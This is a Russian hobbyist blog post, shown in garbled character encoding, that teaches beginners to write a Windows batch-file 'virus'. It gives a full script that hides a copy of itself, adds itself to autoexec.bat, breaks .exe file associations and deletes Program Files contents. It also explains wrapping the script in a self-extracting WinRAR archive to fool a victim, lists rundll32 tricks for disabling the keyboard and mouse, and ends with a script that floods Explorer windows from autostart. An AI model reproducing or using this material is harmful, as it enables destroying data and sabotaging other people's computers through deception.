-–убрики

 -ѕоиск по дневнику

ѕоиск сообщений в Haker_xelax

 -ѕодписка по e-mail

 

 -»нтересы

люблю программировать...

 -—татистика

—татистика LiveInternet.ru: показано количество хитов и посетителей
—оздан: 12.05.2011
«аписей:
 омментариев:
Ќаписано: 4

«аписи с меткой хакер

(и еще 1727 запис€м на сайте сопоставлена така€ метка)

ƒругие метки пользовател€ ↓

вирус вирусописание хакер

ѕишем без вредный вирус

ƒневник

„етверг, 12 ћа€ 2011 г. 19:16 + в цитатник
—ейчас € расскажу, как без знани€ программировани€ написать свой вирус с расширением .bat. —тать€ предоставлена дл€ начинающих . » вот еще что: стать€ написана в ознакомительных цел€х, и за использование нижеизложенной информации в цел€х нанесени€ вреда € не несу никакой ответственности. ѕри написани€ вируса € использовал обыкновенный блокнот.

»так начнем :-) , каждую новую строчку € буду по€сн€ть.

@Echo off (запрещаем вывод на экран исполн€емых команд)
Echo Virus Loading (¬ыводит на экран надпись ЂVirus Loadingї ¬ место нее можете писать что угодно)
Date 13.09.96 (эта строка измен€ет дату)
If exist c:ski.bat goto abc (провер€ет существует ли файл, Е..)
Copy %0 c:ski.bat (копирует вирус только изменив названи€)
Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый
Echo c:ski.bat >>autoexec.bat (ѕрописывает файл ski.bat в автозагрузку
:abc ( ЕЕесли он существует, то программа перейдет на метку :abc)
md PRIDUROK
md LUZER
md DURAK (—оздает пустые папки)
md LAMER
Label E: PRIDUROK (CD-ROM будет называтьс€ PRIDUROK)
assoc .exe=.mp3 (запускает все ексшники как музыка
del c:Program Files/q (удал€ет все файлы из этой папки)
Echo VIRUS LOAD (¬ыводит надпись)

»так мы написали простой вирус. “еперь нажимаем ‘ј…Ћ>>—ќ’–јЌ»“№  ј , и в поле им€ файла пишем, например virus.bat
.bat об€зательна везде. ѕо€вилс€ значок MS-DOS. “ак что бы жертва не смогла увидеть его код будем использовать WIinRar. Ѕерем наш вирусочек и кидаем его в архив вылетит окно и ты просто ставишь галочку Ђсоздать SFX-архив. ƒалее заходим в дополнительное и открываем параметры SFX там есть строка выполнить после распаковки и ты пишешь –≈јЋ№Ќќ≈ им€ твоего вируса. ¬идишь простой блокнот вступил как вирусосаздатель, а WinRar сделал €кобы программуЕ.выводы делать тебе. » смотри непопадись сам на это. Ќе принимай файлы в инете от незнакомых людей и смотри на размер файла.

reg - непосредственна€ работа с реестром. —мотреть reg /? всем!
rcp - обмен файлами через rcp в ascii
runas - от имени пользовател€
tasklist - отображает приложени€ и сеансы, св€занные с ним.
taskkill - позвол€ет завершить один или несколько процессов
tftp - trivial ftp
tskill - убить процесс
reg - утилита взаимодействи€ с реестром
bootcfg - настройка boot.ini
append - позвол€ет открывать удаленные файлы так, словно они наход€тс€ в текущем.
getmac - получить мас
logoff - «аверщить пользовательский сеанс.
mem - вывод на экран сведений о текущих процессах в ќ«”
mqbkup - архивирование
netsh - ??
openfiles - просмотреть открытые файлы.
rsh - выполнение команд на удаленных узлах с запущеной rsh
sc - command line ??
rexec - выполнение команд на удаленных узлах с запущеной rexec
shutdown - выключить (хе-хе) local or remote computer.
systeminfo - вывод инфы о компе.
schtasks - планировщик заданий.
xcopy - копирование файлов и каталогов.
tsshutdn - завершение работы сервера в установленом пор€дке.
set - вывод, задание и удаление переменных среды cmd.exe. —войства системы (пр.кн."мой комп") - дополнительно - ѕеременные среды. “ам не все переменные, но много! ¬се смотреть просто set.
 стати, вот некоторые RunDLL команды, которые могут использоватьс€ при создании батников

rundll32 user,wnetdisconnectdialog
ќкно "ќтключение сетевого диска" ¬ызвать

rundll32 user,disableoemlayer
—бой пpовоциpовать

rundll32 user,repaintscreen
ќбновить (как )

rundll32 user,setcursorpos
Maus-Cursor слева ввеpх посадить

rundll32 diskcopy,DiskCopyRunDll
ќкно "Copy Disk" вызвать

rundll32 rnaui.dll,RnaWizard /1
ƒиалог "”становка —в€зи" вызвать (/1 = без окна)

rundll32 shell,shellexecute
Explorer-ќкно откpыть в коpневом каталоге

rundll32 shell32,OpenAs_RunDLL
ќкно "ќткpыть с помощью..." вызвать***

rundll32 shell32,SHFormatDrive
ќкно "‘оpматиpование: ƒиск3,5(ј)" вызвать

rundll32 shell32,ShellAboutA
Info-Box (о Windows) вызвать

rundll32 shell32,SHExitWindowsEx 0
Windows 98 заново стаpтанyть (без autoexec.bat и дp.)

rundll32 shell32,SHExitWindowsEx 1
–аботy с Windows 98 закончить

rundll32 shell32,SHExitWindowsEx 2
Windows-98-PC boot

rundll32 shell32,SHExitWindowsEx -1
Windows-98-Explorer стаpтанyть заново

rundll32 shell32,Control_RunDLL
ќткpыть окно "ѕанель yпpавлени€"

rundll32 shell32,Control_RunDLL desk.cpl
ќткpыть "—войства Ёкpана"

rundll32 shell32,Control_RunDLL main.cpl
ќткpыть Modul-ѕанели yпpавлени€ из MAIN.CPL **

rundll32 krnl386.exe,exitkernel
выход из Windows без любых сообщений/вопpосов

rundll32 user,swapmousebutton
"ѕеpеставить" клавиши мыши *

rundll32 keyboard,disable
"ќтключить" клавиатypy *

rundll32 mouse,disable
"ќтключить" мышь *

rundll rnaui.dll,RnaDial "пpовайдеp"
¬ызвать окно "”становка св€зи" с именем "пpовайдеp"

rundll32 user,tilechildwindows
выстpоить все не свЄpнyтые окна свеpхy вниз

rundll32 user,cascadechildwindows
выстpоить все не свЄpнyтые окна каскадом

rundll32 sysdm.cpl,InstallDevice_Rundll
(единств. возможность в W98) yстановить non-Plug&Play обоpyдование

rundll32 msprint2.dll,RUNDLL_PrintTestPage
выбpать в по€вившемс€ меню пpинтеp и послать а него тест

rundll32 user,setcaretblinktime
yстановить новyю частотy мигани€ кypсоpа *

rundll32 user, setdoubleclicktime
yстановить новyю скоpость двойного нажати€ *

rundll32 setupx.dll,InstallHinfSection
DefaultInstall 130; C:\file.inf
окно "ѕеpезапyск системы. ѕpоизвести еЄ сейчас ? ъ ƒа/нет ъ" ****

ASSOC - ќтображает или модифицирует св€зи расширений файлов
AT - ѕланирует команды и программы дл€ выполнени€ на компьютере.
ATTRIB - ќтображает или измен€ет атрибуты файла.
BREAK - ”станавливает или отмен€ет проверку комбинации [Ctrl+C].
CACLS - ќтображает или модифицирует списки управлени€ доступом (ACLs) дл€ файлов.
CALL - ¬ызывает один *.BAT-файл из другого.
CD - ќтображает им€ или измен€ет им€ текущей директории.
CHCP - ќтображает или устанавливает номер активной кодовой страницы.
CHDIR - ќтображает им€ или измен€ет им€ текущей директории.
CHKDSK - ѕровер€ет диск и отображает отчет о состо€нии.
CLS - ќчищает экран.
CMD - —тартует новый экземпл€р интерпретатора команд Windows NT.
COLOR - ”станавливает цвета по умолчанию дл€ переднего и заднего плана консоли.
COMMAND - —тартует новую копию интерпретатора команд Windows.
COMP - —равнивает содержимое двух файлов или установки файлов.
COMPACT - ќтображает или видоизмен€ет сжатие файлов на патрици€х Windows NT(NTFS).
CONVERT -  онвертирует FAT томов к формату файловой системы Windows NT(NTFS). ¬ы не можете конвертировать текущий диск.
COPY -  опирует один или больше файлов на другое место.
CTTY - »змен€ет терминальное устройство, используемое дл€ управлени€ вашей системой.
DATE - ќтображает или устанавливает дату.
DEL - ”дал€ет один или более файлов.
DEBUG - ¬ыполн€ет отладку, тестирование программ и редактирование инструментальных средств.
DIR - ќтображает список файлов и поддиректорий в директории.
DISKCOMP - —равнивает содержимое двух дискет.
DISKCOPY -  опирует содержимое одной дискеты на другую.
DOSKEY - –едактирует командные строки, восстанавливает команды Windows и создает макрос.
ECHO - ќтображает сообщени€, или включает/выключает вывод команд.
EMM386 - ¬ключает/выключает поддержку расширенной пам€ти EMM386.
ENDLOCAL - «аканчивает локализацию изменений окружающей среды в *.BAT-файле.
ERASE - ”дал€ет один или более файлов.
EXIT - ѕрекращает выполнение программы (интерпретатор команд).
EXTRACT - —редство извлечени€ информации из CAB - файлов.
FC - —равнивает два файла или установки файлов, и отображает различие между ними.
FIND - »щет текстовую строку в файле или файлах.
FINDSTR - ѕоиск строк в файлах.
FOR - ¬ыполн€ет указанную команду дл€ каждого файла в наборе файлов.
FORMAT - ‘орматирует диск дл€ использовани€ с Windows.
FTYPE - ќтображает или модифицирует типы файлов, используемых в св€з€х расширений.
GOTO - Ќаправл€ет интерпретатор команд Windows NT к помеченной строке в *.BAT-файле.
GRAFTABL - —пособность Windows отображать символы псевдографики, вставленные в графическом режиме.
HELP - ќбеспечивает информацию Help дл€ команд Windows.
IF - ¬ыполн€ет обработку услови€ в *.BAT-файле.
KEYB -  онфигурирует клавиатуру дл€ заданного €зыка.
LABEL - —оздает, измен€ет, или удал€ет метку тома на диске.
LOADHIGH(LH) - «агружает программу в верхние адреса пам€ти.
MD - —оздает директорию.
MEM - ќтображает величину используемой и свободной пам€ти в вашей системе.
MKDIR - —оздает директорию.
MODE -  онфигурирует системное устройство.
MORE - ќтображает вывод одного экрана за раз.
MOVE - ѕеремещает один или более файлов из одной директории в другую на том же диске.
NETSTAT - ќтображает статистики протоколов и текущих сетевых соединений TCP/IP.
NLSFUNC - «агружает информацию, специфическую дл€ страны.
PATH - ќтображает или устанавливает путь поиска дл€ выполн€емых файлов.
PAUSE - ѕриостанавливает обработку *.BAT-файла и отображает сообщение.
POPD - ¬осстанавливает предыдущее значение текущей директории, сохраненной по PUSHD.
PRINT - ѕечатает текстовый файл.
PROMPT - »змен€ет подсказку к командам Windows.
PUSHD - —охран€ет текущую директорию, потом измен€ет.
RD - ”дал€ет директорию.
RECOVER - ¬осстанавливает читаемую информацию с плохого или дефектного диска.
REM - «аписывает комментарии (примечани€) в *.BAT-файлы или CONFIG.SYS.
REN - ѕереименует файл или файлы.
RENAME - ѕереименует файл или файлы.
REPLACE - «амен€ет файлы.
RESTORE - ¬осстанавливает файлы, которые были архивированы с использованием команды BACKUP.
RMDIR - ”дал€ет директорию.
SET - ќтображает, устанавливает или удал€ет переменные среды Windows.
SETLOCAL - Ќачинает локализацию изменений среды в *.BAT-файле.
SETVER - ”станавливает номер версии MS-DOS, который Windows сообщает программе.
SHIFT - —двигает позицию замещаемых параметров в *.BAT-файле.
SMARTDRV - »нсталлирует и конфигурирует утилиту кэшировани€ диска SMART - драйва.
SORT - —ортирует входной поток.
START - —тартует отдельное окно дл€ выполнени€ указанной программы или команды.
SUBST - —в€зывает путь с литерой диска.
SYS -  опирует файлы системы MS-DOS и интерпретатор команд на указанный вами диск.
TIME - ќтображает или устанавливает системное врем€.
TITLE - ”станавливает заголовок окна дл€ сеанса .
TREE - √рафически отображает структуру директори€ в драйве или путь.
TYPE - ќтображает содержимое текстового файла.
VER - ќтображает версию Windows.
VERIFY - —ообщает Windows, провер€ть ли правильность записи файлов на диск.
VOL - ќтображает метку дискового тома и серийный номер.
XCOPY -  опирует файлы и деревь€ директории.

Ќу а если хочешь "убить" Windows то:
@echo off
start explorer
start explorer
start explorer
start explorer - повторить ещЄ раз 100 и прописать в автозагрузку.
–убрики:  ][@ker

ћетки:  

 —траницы: [1]